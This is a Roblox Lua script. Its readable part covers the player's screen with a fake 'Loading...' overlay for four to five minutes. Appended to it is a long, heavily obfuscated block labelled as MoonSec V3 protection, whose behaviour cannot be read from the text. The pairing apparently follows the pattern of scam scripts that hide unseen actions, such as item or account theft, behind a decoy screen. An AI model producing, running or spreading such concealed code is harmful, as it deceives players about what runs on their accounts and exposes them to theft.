local player = game.Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")
local screenGui = Instance.new("ScreenGui", playerGui)
screenGui.Name = "FakeLoadingScreen"
local bg = Instance.new("Frame", screenGui)
bg.Size = UDim2.new(1, 0, 1, 0)
bg.Position = UDim2.new(0, 0, 0, 0)
bg.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
local loadingText = Instance.new("TextLabel", screenGui)
loadingText.Size = UDim2.new(0.4, 0, 0.1, 0)
loadingText.Position = UDim2.new(0.3, 0, 0.45, 0)
loadingText.Text = "Loading"
loadingText.TextScaled = true
loadingText.BackgroundTransparency = 1
loadingText.TextColor3 = Color3.new(1, 1, 1)
loadingText.Font = Enum.Font.SourceSansBold
task.spawn(function()
    while screenGui.Parent do
        for i = 1, 3 do
            loadingText.Text = "Loading" .. string.rep(".", i)
            wait(0.5)
        end
    end
end)
task.wait(math.random(240, 300))
screenGui:Destroy()

[([[This file was protected with MoonSec V3]]):gsub('.+', (function(a) _fuWZQQewiQCW = a; end)); UUjnPu_LskRJzhDG=_ENV;WqmSpJwDoLTMbTC='8r{Afd#MZghp.=9kdfMfh99Z{{#dg#=z;hf{=f&gfMZ{ph9p{hd=f9gr.{k.A##99rAg#dh.9{QkddZMMhp.99{Z#{ghkpAhZo.d9M{h#Z#..990rhdfZ.k9f.ZM.pp{A{#kh.=k=f#dZg=dp.f#Z{pgkZ{Adph#=ryhv7grp=){A+{{Zg9drkdZMM.Akpk{#{Mgg9==r{f.Z#p9fAMMp=9k9{{hd#g>.hi{Mk. vg{d#{gA.=rp#MgApd9r{kAT#9hf=9rZpdkf{MM{AhM.h99Z{{dh.krMf9Z9.k/gAk{.Mdh0=hrfp==({r#rhd=k{AAdMkph9f{{fgpA9!pfkf{Z#{g.=f#{g9.kU9f9A{M.h#9Erhd{=#r={MMfhhkf{=dMpg9g{AdAZMhh(pkM{9#Zh{=.r#AokgDfk9A.M{h.9#gf=A;fAAxpf{M.p#k-{h#fg9=Zr{dfZ#.!khA{gZk9AZ#9Mk=M{,aMA9MZp{9.{##Gghrf;9dAZ{p.k#{9pZkd{rd9hM9{rhfpZhp=h99.{{d.g#A{ZApZ9ApZ-.{.##h?=ZfAgk=gr{ArM=pd9prgMfh.==r.fkgdhfkkAf#9hg9.kg##h>=Zp9k9A{#.h#dAZ9.#kMA##gAkM#pN9h{fd9gZ.{fpf#Zdphkf{9=.bAA9Z{pdZh.pk9AZM{r{ddg{pkkdArM>f{.{p#kl{h#{9Z{9#Zg9=p=.+pfdpMkAAZ#hgg=f=hfgZk.M.Af{MhhAkf{gdAg..=59f.ZdpkpdAf#.gd9#rpfdZ9pkJFA9MMprhM=krpgZ.rrrQAMphg9p{h{dgM=.rAddfdpApg{=#rh.=ZrAd#f<M=pf99{Z=drrAZr&.fZfp9kZA(p#k.A##.hghh=grAZ{.r_d{kMdp{=99{drgM.k.pAMZDpApAAdd=gf=frdfkZd.Mp=kgAdMAhM9Z{{dfgf.pmAfAMkpM9h{##fhV=Zrffdpk9kAfMfg.=k(dd.#.=A=Z{dfrpb.f{dfZMh.=kMf{f{Z9.hk{#=gk={9gA{ddp=k#A{#Mhr.dxpArMrhkkA{AM9pM9kA-dghMhwrp{#ZMp=.rr=#=h9h#k9{pZ=...9ffZ{g#9r=ZrGfhZfp9kZA{#.h#9^rhdfgl.ZN{A.M#=g9h{fd9gZ={x.f#ZHeHkf{9#ZhA=.r#duZp.pk9AZM{h.9.{,dhgffrM.pf9d{fdM{=#fg9=Zr{f.Z#pcAgAf#9hZ9{r.dggj.hWfA9MZp{d.###Agh=f!9fZZ{p.k#MU#hhd=9rZd{Zh.#6dAhMfh9d.ZAp9G{Ad:pffM9pZk{{.##hQ=hrff9ZZ.Zk.A#M)hhlfr9dhg{..(#fVMhpfk={Z#dg.=MryfhZfp9kgA{MYh#9rrhdfZ9.ZrdA.Mgpe9.{f#qgZ={rff#Z{phkf{9#ph{=.{#dHZh.fkkAZM{h.9Zdfdhgf.9GZfMM.pMk^{h#fg9=Zr{dfZ#.{khAf#9hZ9{r.ZpgD.pHff)MZpf9.f.gfgh=d%9f9Z{p=k#AM#hhZqfrZd{Z...HVApMfp{L9{{d.g#==UhfdM9pZkM{.#MhI=prff9ZZ.{WfA#M{hh9fr9dZg{={Agf1M=pf99{Z#Ag.=Zrufhgdp9kZA{#.h#9 rhdf.p.ZU{A.MZpH9h{fd99M={c=f#ZAphkd{9#..Z=.r#d-p..fkkAZM{pr9#{rdhgf.9*Zf{M.p9kH{.#fg9=Zr{f.Z#kdkhAd#9hh9{r9d#p#j{QfAkMZ9f9.{M#}gp=fr{#9Z{p.k##{#hhd=9rZM9Z..M1}AhMfh99ZA!M9g#={6hM#M9pgk{{=##hf4lrff9ZZkfk.AMMthh9gr9dgg{.kY#fJMhpfff{Z#fg.=#r fhZf=ErdA{#kh#9{rhdfZ9=hrrA.Mhpc9.{fd9gZ={{rf#ZrphkZ{9#hh{!{{WdDZp.frpAZMAh.9.{Dd9ph.9}Zf{ggp#kr{h#Z.f=Zr{f.pZ.EkpAfZ3.k9{r=d#gA.hUfA9Zh=g9.{Z#*gk=fR9fZZ{9Zk#AA#hhf=9rZd{g99=iSA9MfpB9Z{{d.ghrMBhf#M99gk{{=##h*9{rfdfZZ.Ak.A#M/hh9Zr9dkg{=jB#f0Mhpfkh{Z#hg.=hrPfhZfp9lrA{Mdh#9ArhdfZ9.ZCfA.Z/p*9h{fd9gZ={r#f#Zpphkg{9#Zh{=.{rdng#.fIAAZM{h.9#AMdhg=.9rff{M9p#kFdZ#fh#=Zrhf.Zk.xkh###9pr9{{rd#gc.h2fdZMZph9.{9#)hA=f{9#{Z{.fk#AZ#hhZ=9rZ#rZ..=2^frMfp#9Z{{#Ag#=rVhfhM9pkk{A_hfhy=.rfMNZZ.Ak.A#prhh9dr9dhg{..s#f pppf99{Z#fg.=#rtfh.hp9kZA{#=h#9urhdd=d.Z}{A.ZZ=Z9h{fd9hr={0.f#Z#.Mkf{9#Z=r=.rMdHZh.fB{d9M{h.9#fkdhgd.9qZMZM.p#kQ{h#fg9=Zr{g=Z#.rkhAf#9hZ9{r.Mngb.hvfA9MZpA9.f#gkgh=fi9fZZ{=rk#f{Z9hf=krZ#-Z..#;}f.Mph99h{{#dg#=56hfhprpZkd{.##hH=prffkZZ.{_=A#Mjhh9dr9dZg{..fZfWM.pfk&{Z#Ag.9ZrgfhZ#p9?dA{#.h#k{{Mdfgr.Zr#A.M#pt)hAdd9gp={Gkf#ggpht#f_#Zh#=.{.d0Zh.fr9d{M{p;9#{fdhhp.9rhdAM.ppk_A9#fg9=ZA{ZpZ#.dkhAg#9hk9{{9Zqg =B)fd{MZp{9.f##Agh=hc9f9Z{.9k#AcMghf9drZd{Z..#Xlf.ZMh9ku{{#hg#=j6hd#gZpZkp{.M{hj=hrf#:gr.{ #A#Zdhh9fr9d.g=..(9f:ghpf9k{Z#{hf=#r.fhZgp9kZA{#.ph94{Mdfgg.Z_{A.M#.f9hAGd9gh={S9f#ZG=rkfAd#Zh==.{{d;Zh.Mk9AkM{pZ9#{pdhgZ0.HZfhM.=bkT{p#fg99Ar{dfZ#.ZkhAf#9h9rdr.d9g!.ptfAkMZpZ9.{#Mrgh=f 9fhZ{p.k#APMphf=9rZd#Z..#jmAhZdh99Z{{#fg#=QShffZkpZk{{.#ghi=hrff9gg.{k.A#MMhh9fr9dZhA..o#fyMppf99{Z#{h9=#rgfhZ.p9kZA{#.hh9w{fdfZ9.ZH{A.M#pg9h{=d9gh={!9f#ZR.dkf{9#Zhp=.r#dvZh.9k9AZM{h99#{Ldhgf9#0Zf{M.p#kx{h#fh{=kr{f.Z#J#khAd#9phA+r.d#gy=d1fA9MZ={DA{##7gh=f09d=Z{.9kgAE#hhf=krZd{Z.=ZrhAhMfh9kA{{d.g#kv{dffM9pZk{{.M#hq9.rhf9ZZ.{e#A#M;hh9f{kdZg{..7MfIMhpf_HAf#{g.=#{AfhZfp9IhZj#.h#9V{ dfZ9.Z{ZMNM#p)9hdkd9gg={rvf#Zf9+kf{9#Z===.rMdFZh%hk9AZM{h=9#{<dhh#kdaZf{M.pgk({h#fpu9=r{f.Z#.{khAf#9ph9gr.d#gj9fRfA9MZ.fk={##0gh=.s9fZZ{.9%MAV#hhf9krZd{Z.=ZJdAhMdh99={{d.g#kwrnffMkpZkA{.MdhW9.{df9Zp.{rfA#Mjhh9f{=dZgA..:gf3Mhpf99Ar#{g.=#rOfhZ#p9kZf=#.h#93rpdfZk.Zl{Z{M#p49h{dd9gZ={S.';tEEVaRlrEmpHGycDB='X4f-:d/UxJ15Sq(iJd15qq04f4:L4qU(5CSS(:4x-6dJU5dx551fSU(17qf5J45US((i4qi:/5dd1JSi(/PU-dMSU(/qS4(Ui(4i:qf:JJxdqJii4/-U/d-S5fJqi44Uf(:iUqd:5q5duJfi://UJd/Sq5Sqf4:Ud(Ui1qx:(S(Uiif::S/Ux(5U,5-4:x/JJU/(qiq4(U4d/Jxi1/SUidSS--fiJ*5dJ/id=Jfqd-/i:q5(1iS1(SHi4ix/5:xxiJ(5-i4i:xUdq:(x+S-f:(fSJqx(1d4;(q-i-:::1xqxi4qF-x45:J5:Jf(UqJ{LfU-(1JxdqqSSi4& /UJd/Jq1SSfG}EfJ-51-J(1SVSiUf/://UUiJ(qNiU4d-ddx/5q1r74U-x//-q141)i:q:-4_iU5J5xK(6S-i4dS-xx5xfqd5Si:4/fSJU1/JU((S5:fdJUJ1dU1(fqq(5:5--dSSU1-i/4q&:f-d45SJ5((qqpd4-xq14Sd(5zU(dd/:Ud(SJ1USJ(1iq/4J411xJi4q:jf/q:S/(S-5d(liU/f-i/45J1x5Jf_:(ffJ-xdqJ5J(fi:dSdU/dSd5.qSi5f:-xdUxJ1qSSi:4ff:J-5JqZi44ii//qdJ1qxq(1Sx-:d:-JJJUS114di:4--5dJUd15Si(dd=fq:(U-JS1U4(-dddx4d/5(5JSUfUIi-x1-xDqUS1(NiifqJxU1SU51(f(id(x:J55S(1S4fJf::4dix-1USxqJ:d/d:f5-qUiiS(-d:iUSJUq4(xHx-:zJU0x15Uqfqd(5d/-f::1q1U=xfqP(d5xU1,Ui(U44-5dNUUJUU:qS5i(id(:%d//J(oiU4U:-4xxIU5xJ(Jq4i1/d:xJUUiJ(SS-U41/U/Yx:x(iqf--1d5xJ/^SxS-q1iifE://UUx(:v:(4dfU/J(/qq:((45-/U_xU1Uq-1xOifJd/U4U:x1idq4(-df:/d:5q(4;Jqx:UfUxf5fS511jS4d:4/SdJS5i4Sf-4f-U%JS5dJ:iSf/dt/d:-151/5:4:iqfdJe/qJU(dSq(S41xd/xxU11qfqS:q-iJ-U-JS1(4q:-d1U51Jxt(x(-iqf-:x//x1JxV:f:O4UfJ/5(xqi:a(-5d/JH1USUi-Sxfi:JU/J4J:114di4j-Uf//5-q:Z/45-q/JJ:/4Sdidh((qdUUx115i(4Mq-xaq-4//5-qiixqU-i/5x:/-S5iU4m(idUx415S}(UaU(::SfidiS(5wS/qJdV/UxU5-xxi_(5iJdJ:4/1qd5:Ax(i9(-S1UxU1SSJifi(UxxS5rq/ifq>:4-f:J5:J45fqx(x:SUSJdU:qS5i(qdx-dxJUqSqS5(f:qfJd4UbJ/1:H5-JcqU(URS:1:Sqqi:U:fd}5#JJSd(qn5f-:fU-J/5U(liS,iU(1:55qSm1(4d-::JxUxqd5-4i-if:x:/UJd3vqqfif/://YJx51qK-54U-(d(xxJf#Jf&:N/S:41J1:5f4fiqf-x(/SJ4(dS5(14xx-xi5/1Uqgq1:J/ix/1Uqd1S4:hif/:(/qJ-5/S:-zdEfqJ(Sf(15Jf9-1/Uxf5Sq-i-4ii:d5Ud1f5qS{q/:44qfiJUS-qS55f-:qUUxS5-q-594xi5f5J1USJf1d4S--d-Uid:5S5USdfd4D-/14UiJiSUq(iqf5J/UxSJ(5qS(qdSxfJJ51(x5ifUff-q/:xU1US/qU:-/-:T54qdiqSS--:qU1JdSi(/z/-fBU/(xx5dq q-(Jd:-}:f5J1di4f--idUx51-SS((S5f14fUxJ(5dq/{:q5:--(d:5iJ15(qe-i/dUSJqS51f*5-qdJU41d5q(/%xqq:(f5J:Ufq4SS4UH)//-55lS/ix4S-Sd5-ZJUJQ(S44f4u1/1dd5JJ1i/(43UUf:qU4xS(54U-V*ixJJqS4(UV-(4dxUJJi5fJ,iUfdiJ/xx(1dS/i:S5-ff(xfdix1idq#i:ciUfJfUUq/qfidiqd1d///Jmi(4d-d/4-/J5S((:s--,GxUbJS5dJ:^-fJ:N/4xi//S(SJf4=TdUJ41iS-1J4f(i41xd/Tx:JiSffx:(/dx/5:x5i-((:f4iUi//SJ(JS/fqfJ:Sd:54115q-f:J/JJd/1qfSq4J?:d(U(xU1iS(4::-d5-JJJx;qiKJ--:x/ixi/Sq-Siifi1dUd4/-qx(ili-54mUxU-5(i1qS(::4-x:q5-qqvU4S:-/-:81U1-S/S(f5fx-U1SS-(-gi(:d-/dJf1q5yiSf(:1/fJ/1(qUiJq/-/fHxd/-Si(d4U-5d5U1:i51Jqq#(U:S/1J_U-qf5J4(iid5:f14Sq(/SdfqdUx4J/5qqq51f44q:N:x1d1u54f/-qdqxJd(S/S44-fddf/qJxSf(Ss4fx:xfdxSxx155-49kU4SJ41xSxi:SJ-4fSU(JV5qqxiJfiHSUJdx1i(JWU45<4/1:UUfqq5xqSiU41-qJ:Jd(fu(fUh/UdJ55fq-74qx:J-5xi/SJU2fqq_x4SUSJ:S1qSqif1QxUOJS5dJ:iSfx:4fexx5:Sq1S4:-(/xUqd5S-5(SSfS4:-q1xxdqSS5(dW:-fJqU51-Sd4Ui:/ddU15x55:S/-dd5UfJ-S4Jx3zi54J-:dUxf1:594S-S4Jx11(q/1d9Sf/d-/(1x5iqik5(8:U/4x(1J1SSffquJ45x-1iSx1U%i-5d:--J5SU(B5ifUd4U5JF/(q/q4qi-ifUdF55JxSIqdi:ffxq/(Jf5dqd(:dd:UJ5U51:5/-m::/xx(11xxiJ(1 4/S:xUD5(1Ne:-::qfSJ:UU1d4B4S-i-d/IUU(fSf(drd4/Uq15Uiiw(f-/4/-id45J5:Sfffe5-xd/UJJd5:(/QSfq:qUfx4iL4/fq:(USd-Sf5/g1(1:UfdJ454J/i/qJTUUfd4U-SU5xqf>xfS:f1qx11SL-i1O:U5Jf5fq(5-454/f:x:/qJd;=qq.4fx-qdSx1idq-id45-(:S55(4ix4J:U4(x/x4J1S_(dr-4-UiJiUS(q44-Jkx/ixJ5/q4)5ff:f/(:-11S:i4ZSTifdJw/SU(i:(4-5dJU51dSwqxi(f(41/UJ-1Sx5i-4q:UdSx-1-xs(xS5i5/1:S/fUd(SK-f-:if:xSxUJdidq(7/U4:qU;Jx1(Sqi5//U:/d5x1i5qfSdf/Jx15xxiiUif<(--dLUUJU1U4---4ux41dSqJSV-4q:1/dJi5/q/bfqU-(dxxd1#1-5Jf:3#4fx:UdUqq1qdfn4i//d(x41Jif(12q-aU(U/JJ55A1+ffd:(J/x(5&qSffff::x5x-1dSJ4UAi-fdx1-J55q(4fifid4JxJ/5:z4iiff/1/xxUq-S5(q4xdidUU5JS(5(-Kd-4UU/(5q51B-i54(:dxixU11qf454--/dS1UJiS4(J--f5:(U&5i5UqJii:5:/J4J45:i1if4:-5x/x/1U(i(U_1-ZU5U1JU(:qSiif-U!/xxS1iiSi:4U-1xxxU15i4(ivSd1dfUd1t(/(du::i:/JdJfq5q-i/4q/Udixf11i-(5,(-:UiUUJJS4k50-f/:xJUxi54qUf-4q/J/4x:15id(q4G-Jx4x41-(1(Jodd-df/i5S55q1fdf--ix(xq15iUi/4-/FdxU51-(S(53/dd:SJ5Jx(4qJiSf-/q/dxx5tiJi44:-1xdUqJiSU44YJfS:(JqJd5UqqfJf:/i/iJ4qxq0i:4//:dSUi1Ui9(x%1f(USU:JU5(KxATff:/J:xS1iqxf7fR-1xJxU1xif(i4-d5dJU1S:Sf(-fqf:U-/i5J54q:iS:d:d//1(1(q<4UKi-4dS1-J55q(4fifSUdUdJxq(q/iJ4S/1/fxd1Ui/i/4JdidixPSxST(-05d::S/(J/(0(ti1:J:4/:xJqdSq(i4f/4diU5S1Sx(/--f5:qUU5i5(qqfx4i/(/15:1SSiiU:H:W/41J1JS54fY1fSdUJ(J/5xqSf1fUUN/xx15fiSi:4U-JxxxE1-S14:kSf(df1GJx55(4fSf::U/i5x5Uqdf44(:4x1xf1:SU4/n(-4dJ1f145S05N1fqU:/Sxi54r#T_f4/J/dUd54i(f1:-ffx15:q(i-q4-J-::f1fx15-4(i14(:xd5U11x4-4i:U-:dS/1q5Sqf4%4f1-S15q4(x;J-Ut(U/U4xx5fq/i441f/Jf5fxir^f::S45xfJSSJ(:4(-dddx4d/5qqU_:4iff-x1-UiJ4=/i::qU4Jf1Sq:i^(U-:/>UJdxSl(S?d(::SUxJ4UmqxM:4qiS/:Jo1Jxxi=(5iJdJ:4/(xq5xSS(541:4/fxd1q5xfN:S/d::55JfiSqJu(/fxxJiS,((SdfqfxxJ1(xiqq8JfiEyU4/-UJ(:5iq(MdU{x41:x4(x4/(1dJUiJ/5U(d5Sf-4i/5d/Jqq(D5f-->:4J:J:x5i:qf#Ud:/q1-5d5xZfiS:J/fx(111q94i4-(/1x-/fq4iU9(fidq-:JqSi(5Q--U:iUxJ1/iq-5qf/_:U0x/5xqSiS45ivdxU41U5J51VU--:Sf5J1S.qUixf/iqUf/m/(Sin44q-d/Jx411SS1J4-i-d(-/JSSfqJi1fxiiU:d41S1x5(fJN:fx://qqx5:q/(JdxU(Jd5/(:55fS4(Ui1fSUJJs5-unfU:JJ5SS(i:C5fSd1-41pJ:1USq-x4--U:J5xq(id4/::45x-U(J:iiq1i(4?Ui1d5Sqqa5(f:q:dJ1/((xiSf_://f:35Uqxi(44(id/x:dxSJqJq4-S4U-qx115qJS:?1f(d-/xJx51iii(iJ/x:-JixJ1xBJ-5dU/i1-55(:)/(-?U///45JJdifq6:dd5xq54q4iTSdfq4x-(1Jx:1x51ff:(/U:iU4Jd5xsi4ff0x45-Si(U45--dSU(d5Ui(dqJf5{q-d1nU5Ji54f/-S/(Jf5fq41/4d(Sd:xkJJx41-SUf1:1fUJ/x11q55(/d4fSxd/5qJik4r-S44xAU:USJi?:vp4/x4dSUi1f5d41:q/-xf1ixU(i45-:4-U51USpJim(-::5/SJ1U4(_q:qqd4f^J11(qfix4:ifd1d:1UxJ544SiU45fqJ:SfJ/%U4UTiU1ddU1Sx(J4d-4-:x0/554qdi1{i-i/41/1d1+Mi(1:/-%:i5,(fi(4/:1/fx51qx11(;qFx/{-SJJUU(S{f-:dxUxJU/Sq:5i(dduf5:i/4SJid.(i/4x-Sdi5q5Jh-(q4dxvd5UiJ4iq4qi1/4:dU-q(5Jq(bSfi:d5hx51(S4-x:i/iJ5UMqUq-(Jd:fidf/dS(5Jv44-dxx5x15d((+:((dU/UdiS11dSJ4xH1fJxd/iJf5dqx:4d4:J5:xi5dyff-dJ/J/4SS1USS41-5--J(UJJS(Sri::/1-5/(qJ5:qUi-4U:K15xU1JSd(1V1U-x-U5(/S4(U-:ddx5J5J-i(qJi(:S/q/dqE15Si4(:4U/JS/q13E5(/ Jfd:111x(1qq5:/ff::/Ux-1/SJi(:(:/J5U1q1qv4q:J/f:41Jqd((Sq:fdxx11(S((qSff54/U:xxSfqxqqGf:xd::55:S:5SfU,ff/Ud/:S-(ikxihfdx4dxSdJ(SS(xB4:-1<JdS(1((U-/-d/-1JJUqqSi-,/:dqxv1-S/4-V54xd4dqJU5/qq4dcS-qdfU/Sd1d25f(d4:ix4xq5a(:(IvS/qdi5-(1(74S-5U-JJx(545qfd:xd---x-Sdqi(Sf1:S/f:51xJUi54(dd4q/(1d(4qf4:fJdJ/-5oJJq/qS-S:1U/Jv5S((in-4 dU1US1SJ4iUf/4(d5/:5f1/(U45-(:-U-Ux1SSfi1(::<-xJOU3q/q/4S44fq/U/dq1154q-:ff:dU(JqSdi:.5fJdq:/UixSSdioZUd1/J1zx1(/4-fSdR:(xlJ:(vq1iUf5di//Jxq1i:fViU-xxv551S;4A5(S2i-fJx555f5(45:/-(/<x:qf5-4JCfd(UJ/fqq5(4f4S/SxSxdqdqU45fi/4/S:S54JfiU--fJ-:UJ1UJ(#di/4q:4UU1hxd5/S5c(-//qUSxUSfi1-df5:(d1S4JimU(q:qU0J-1fqJS(4ii/f4UD/U5/JiSf(d:5f5/(U45x5U4dffd(/xJUxJS4Si(J-1U4xn1fiziq-/-5:fxJxxxqSUY8:f/)xx5USJ1d8ifd4Ud(x(5J544d41-4fidix-1/5fb-ix/fdS1q1f1U(x:xfU/qU:Sz51q/653dU:UJxd51qfqx://:/qxS5-SU(f-ffxUUdxq-J(qxf/:(d-U15fS-ix(f4ffx:f1UJ((q(:41:fxixxS:Sq(44-fUdJJfSqS-i54(4:-i::Uqx11qiqfq4/USdSS/Si(-fiO5UdU(x:q1(xi:f(fSd11-5J1ifqdY://J5Jx1ii4-iJ:UdqJdxq(zq-4J:J:(xi/5qdSUfSA^-/d55xq5i(if---xx1/55iqdFdf:fq/JU-/qS1SJ4<-S--JU51qq(ff-iUd-U5x:S4qikU(-:q-fx/541x(-((fJ:U/1xq1dq-fx4J4-di5:Sx5q_(-q-4-:xx5q5q(d4:dx-UdJxiS-(iiS-dUA:(JdJ:5xq14BfaUb/(xJ5:Sf4(4q/:/(U(1fSSi1-/dJdQ5dxiSSq5f5:iU4JdUdSdidf4:xf:dg/11:S/qSi/U4dfdiJx1dSx4J//xSJ51did(1H::i-UdfJJ1/5f4xfdU4/55J54(1N-fU-q:1x-1Uq/q/4S4Sxtx(S/Jq>S(q:4UdxU/S(4idqiix:2:5x/SU(d q4fd-dxJ:5U(5qif;fd//US1USf15cx4(:(-UJ:S(ix4-frMJU-:iS1qUifq5-x-iU(UY14q14ff-fSJ4xdxxS5qS44-xU1JqUq5(w/fd:SU(dq5)S/i4i5f-dfxx14Sq(U(dfS-1Ufd-xSSU(d-1f5:(///51S54iq:i:-d-U(JJ(xqU:U-Sxqxf55qdj4-J:UU-xqJ/5q(4q/--d(d/1:5f(1(f8:d--:5f5S1d#-(Sd(-i1:/i1Usq--ZdUJ///(SJqU4_iI4-/-xU1J5/(iiS:J/dU55-S4q:4:-Ud1xi5(S-s:Si:1dxUU5/5-1q4Sf44xd5155/S:i4-:-JdQU-5:x5i1i(f(/iU:5d511Syq7U/:U5JJJ-qf4-,SdSfqd31:51(14i-x/AU(JJS(iq4:fd-Udi/51dq:(/fS-q-qU/5x1d554x-f:xx11qx:(JS1fif(x(JxS+q(4Uf::U/1JUJU(Jqq-cf-f(d(Ja1:(-0(>q-o/fU/U5iJPq-i-ef1U1U>q/5/-:-i-/x:/(1/5:(S:Sd//RJSSJ5/(S(/4f:f1US1S-4affdJUJJiU7(dq1iqfqfS:idS1SSif74df4U4x5U:1q51fyvJ:S:i1551qxf1-S://x5J1iqfD(4U4q:r1Uq4S/4Uf4d1Uq1CU:1d+S(5dff-UU/JSi1iN5idd4-5JUUJ514/-S:5/1UxJ/(xi14t:&/-:x/5J5S/S5cS/6xR1ix-5J}Uf/4q-i/-xdqJq-(4-q-d:4U5JqSw4}im:4d:54Sx5dZ(4i:fdxxxJ15qqdi4:J-(xix:5f(iiS4i/q:(5-JS5i(fiqd/xxJfS(1S44iffq/::dU(1foJfS}:d(Uq5dSfqqqSmp:(/J/x5Uq1qJi:dS//x(1qSUq(iq:(ffJU5USd1(idfq-5d(JUUUSU4d-5fSf/1/SU5S55C-34f:/S1q5f1Ufde5-qdSJJUJ(f(S-qd4x-1/J5q-%S4(44dUdUxSSq(54-4S/dUx5sq-SSS14f:1d4xUUq(((:-4f1-//5x-5415Fx:Sf5U(5f15(UqJ-(NJ///q5JqUif---x:(x51(SSic4fi(-iJ4xdS55JSdiiZ5/xJxJq(iq4-dfJ-1dqUf1-if4df-d5J-1FSq(/SUfSf-Uf/JSfSflx-U::/UJ:1d1Si-iff-dS//xJ5qH4qi:UBiUd1q555fr4fq:U:d/x1UJNSUq/--di:x/fSS5(iJg:fiUUJ(qfqU4xOS/4df1UJSJf4ggd:f4(xx/:(fqU(5:5/5:11{5i(5S5&-44f5US1fSf(:RUg/:(UqS_5/q1Siidf5dq/:1SSi4i:ff4Ur/US:Ji&z(dexdI:(1iSqqSii:Sd4x4JixJ(1Si4Ud-:dU?1-5/S:idG1-5d(U-15(1f(#q:Ux-JJSJ(S*fWJ:x-4x(xq5riUi/fS:i/UJd(1i(-k-fU/x11x5(q)4/=::1x(J65S5-8ffd4Sf1d:UU1Svxqi:Sfdd4UxJ(5dS(Px:4xdU/JU11Sif5-fU5J4S/q(pfiif-fqJf5wSSiS4i4xdi:-1dq-1Sif-4dIU-J/x^5-(-4id:U(d?UdS(ix4Uff-q/:1-1d(J(-fS/4Ufx:SW1dF/f:41/i/:1qqdq/q(}4f:x/1(q4Svqd-1dxx4U4J:(1q1#(-4:4J:1i5JSii1:UU x(xixiSS4:-S-(xxxFSxS4^fiqd:Ux//JS1(i1(::d/-xi1/5bS(if-J-Udi/-q4SS(Uu(d/:iJSxq(xiJfxff/1/x5;qfi4iS-S/:x/UiJ155 /-/4/-iU:UqS-,qf14J-Sx1xfqdiY(q-qf4d:54SfSSqp--/F-JUd5U1:iq(x7q:xJNJ-q5b:4diS-(U(U5x(S((qfUd--5J(S4qSt5(SfS:5J-SKJ(Sx(4-1-Ud1x1SJSSi-iUfSUd1#1/S*S5fSfJU//UJ5(ES(4i-1fUJ:1SSiiUi44x-Ud11/JU1d4Tf/f5-/JfJJJiiif-fJ:xJpx11:5d(1-1f>xdU/1/SJnd-1fdUdJ45:51(Fid:q/5x/x-qxif4(4x-5dqxcxJif4-ifd%d5J5Sx54(-9/:(-f/iU-JJiJqSffff/:x5S1SQ4di/fUdJJdSd5-qxfJdn:4J45_5-(:q(k4-/xUUJqxi:qd-/-xdxUJx:(iqxr(-4/Sxi5UqfSi4x:x-x/:1:xi5f4iixdi:(JSS(S4=(-4dF/5UzJ:JSS4iq9U-5x11Jq/q-i4-dfqUx1qxxSS(i4fff:idxx51qiJi:ff/d:q51qf5/iS4U/::fx6Jx55q(4,4/dfJf5x1fj-f1:J-//4xfxS5xqqiS/)d:x1Sd(x41*q4/Uq1G5U5:(}f-^5-TJP5J51SSqi-x/-d/x:xq1i(:-Jd/d1/(S4(:qUi1:d/i:ixxJJqi4(-q/Jx!x1S(S5q/iUf1xUJ5Sq54(SiSfJU//UJ-q-5(iif-fJ/J1S5-iUid4xf(U(/-SJ(x(1((fS-:dJJdqqc1l/d=:x/x5:1fqHqx-1/fxd//SfSd(Uiff-dyJ4Ux(1Wf(Uff/1x(5dqJiSid-q-tdd15xJ(/4J;f-::1J55J54iUfSd::xJ1Ud5Aix((-f-fx11SS5ifq4fS/4d(UUS1q((d(5:5/iJ/51qxq/i W-:-J4x:qUiGiff---d5/iSfqq(-8(4(:4J:5U5dG4fA:x:dxJ1514q441-S:-U/x:SJJqSU(14iU/Uf1Sqdjffddf:qxk1:5Uq(((:4dUd4JqSi(57--U:iUxJ1UUqU5(4q^-f/:(11Jd(i4i4i::/(xfq-idSq(q:(xYJS5:(xnhfJ:5fx:S5fqx(i49-(4dxS/USS5(G1idd(dxJ41-(SCU-/-Uf(x5U/q/q(f/-i-J/U1/1i5(S(fi/4UqJdSJ(431fSHJUfd-1(JJidqS::f4x4/Uq}54cq(5:iUiJxUUqiSJf:yS-fx(U:q:5(4J#:di-(1fqf(5S1-54J-iJ5x4(7S5-FRd/JJJ5fJ4iJ(-:xf/:J1xq:(qqdiUdxx11/5(if}1--dd-fJfUSqUSffdHd/xxx/dqSSJ4:ii-5U1J)SS(x45f(f(fS1-51q1K/q5d&//Jx5SqSi5q -U4/U(11S-1f4J_ddi-JJUxf(f(1-f:5:dU-5f551if,4ffzxJ/JSU5fi5--//dxx/JJ(i(4(xBU/5d/xiSYqJ41fU/(JdJ1x-(i}ii:dq-UJ5x/5iV:41:1:xJq1/q55Sif4//f:q1xS(Sqf:-:-xUdUJU1i4pxfxd:fJJ1xSJ1A-(-:4fSxUxxSJi444:-d(xf/fx4(dqv-/d1:S/iSU(J&-f(iqUfxx51q(i(4qifdJ-x1 S1i: J(UdSUf1:Sx(xtUqS:-f1xJUIqU514qi:dxxx14xk(xqffq4d-5J/UqqS554i:i/x:U5/JJi:qi-5ffUq1qS/1dZqi-d--q1ux-(/S/(S:xf(xqUxq-5f4/:/di-(1/JP(Sq-i/ddx4J1UJ((D:-/d1U1JJ/(q/5S45Kf/f:S1iJfidqdi5dU-q1:xU(-SqfJ4)-/JfUxqiSf4(iS/)JM1JxxiUq1-/4:Ux1xS41<=x(i4fU4Jq5/14i(-e:S/:Jx5pqJi5qx-iffU(/xS-152(f(%5xf/i511dNJ-/:-dqU55fq((Jqf:J/Wx71Sx4i/#S-(/fxf14U/qq5Sf:dO/J:x5i157dqi-qfxxxJGqxi4(54Jdx/4ddS/5xS/fi44/qdx515fqdAd:/Ud/-5/x(1q44iS:1xdxJ55q4(44U-ifJJd5dJ1N-qq:4fS/15:Sx(qi1-x/x/x/fJx(dq 